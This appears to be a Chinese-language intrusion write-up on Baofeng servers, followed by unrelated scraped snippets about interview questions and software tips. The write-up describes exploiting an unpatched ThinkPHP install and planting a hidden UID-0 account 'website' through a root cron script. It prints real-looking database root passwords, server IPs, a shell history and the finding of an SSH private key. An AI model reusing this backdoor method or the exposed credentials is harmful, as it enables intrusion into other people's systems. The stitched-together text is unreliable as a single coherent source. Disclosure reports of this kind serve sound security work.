這台伺服器使用了thinkphp框架並未打補丁,之前的**執行成功利用
打碼兩台貌似是資料分析的監測平台,避免資訊漏點,就不貼圖了
繼續翻看,在117.79.151.23這台中,
/opt/script/發現了兩個python指令碼
這是可以給員工發簡訊的節奏了麼
panxiaodong同學。。。唔,應該是苦逼的運維同學吧
以上都是小事,接下來可能導致的問題才是正片
測試過程中,發現/opt/programs/sifu/result/下所生成的日誌檔案都是root,並且每天定時更新,追根溯源,找到了生成日誌的指令碼檔案
#!/bin/bash
###################
#計算伺服總請求數量
#福玉 2011116
###################
stat_date=`date -d "1 days ago" +"%y%m%d"`
stat_date1=`date -d "1 days ago" +"%y%m%d"`
echo $stat_date
zcat /opt/data/logs/sifu/access_$stat_date*|awk -f'=' ''|awk -f'&' ''|sort |uniq -c|awk -f' ' '' > /opt/programs/sifu/result/request_$stat_date.csv
/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8;delete from sifu_scheme_request_data where ip='24' and stat_date=$";
/usr/bin/mysql -h60.28.110.197 -uroot -p223238 sifu_repair -e "set names utf8; load data local infile '/opt/programs/sifu/result/request_$.csv' replace into table sifu_scheme_request_data (count,version,ip) set stat_date=$;"
並且發現www的組有可寫許可權
於是乎,加了這麼一條命令
useradd -o -u 0 -g 0 -m -d /root -s /bin/bash website -p $1$k3gq/1e2$afsx.mfcbalxiiitgz29q.asdf=123也就是說,在系統執行cron計畫任務的時候,除了以root許可權生成每天的日誌,還會新增乙個使用者名為website,密碼為asdf=123的root使用者
以此來達到提公升許可權的目的
在使用者目錄下,翻看.bash_history
su -c "ssh -t [email protected] sudo ln -s /opt/baofeng-data/league/package/3.10.06.30.exe /opt/baofeng-data/league/package/3.10.06.30_124.exe" uniondown;
exit
ssh-keygen -d
lscd ~
lsls -a
cd .ssh
lscat id_dsa.pub
cd ..
ls -ah
ll -ah
ssh 122.139.57.37
lsls -a
llcd .ssh
lsll
vi known_hosts
exit
llcd .ssh/
llcat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
支援看來是運維當時用這台主機以uniondown使用者身份私鑰登陸了61.155.220.222
果斷進入.ssh目錄,發現了私鑰id_dsa
'url_model'=>1, // 如果你的環境不支援pathinfo 請設定為3
'session_auto_start' =>false,
'db_type'=>'mysql',
'db_host'=>'***.***.**.174',
'db_name'=>'sifu_repair',
'db_user'=>'root',
'db_pwd'=>'223238',
'db_port'=>'3306',
'db_prefix'=>'sifu_',
'app_debug' => 0,
'html_cache_on' => true,//開啟靜態快取
'html_path' => '/opt/sifu/sifu/pop',//靜態快取檔案目錄,html_path可任意設定,此處設為當前專案下新建的html目錄
'memcache_host'=>'221.238.27.174',//memcache主機ip配置
'memcache_port'=>'11211', //memcache埠配置
'access_ips'=>'192.168.%,127.0.0.1,218.***.***.34,60.***.**.102',//允許訪問ip位址配置,%為萬用字元
暴風影音筆試總結
1.溢位和越界有什麼區別?溢位一般指超出表示或者儲存的範圍,比如資料溢位,用short儲存大於2 16的數會造成溢位,比如申請的記憶體超過可用記憶體大小。或者字串拷貝超出陣列長度。越界沒啥好說的,一般是指訪問到了陣列範圍之外的區域。2.是乙個選擇題,給乙個字串,然後問下面四個選項哪乙個不可能是其入棧...
程式設計例項 禁止暴風影音後台程序
rem exescript options begin rem scripttype console rem destdirectory temp rem icon f 娛樂 電腦 我的圖示 cancel.ico rem outputfile c documents and settings adm...
暴風影音使用技巧十則
暴風影音使用技巧十則 再分享 原文出自 暴風影音 1 暴風影音 最新版本6.12.27 暴風影音2006 官方無外掛程式版本 安裝包中已經完全剔除了所有第三方軟體,這是近兩年以來正式推出的第乙個無外掛程式版本。公升級功能 6.12.27 對 6.10.00 的公升級 公升級 gspot 至最新 2....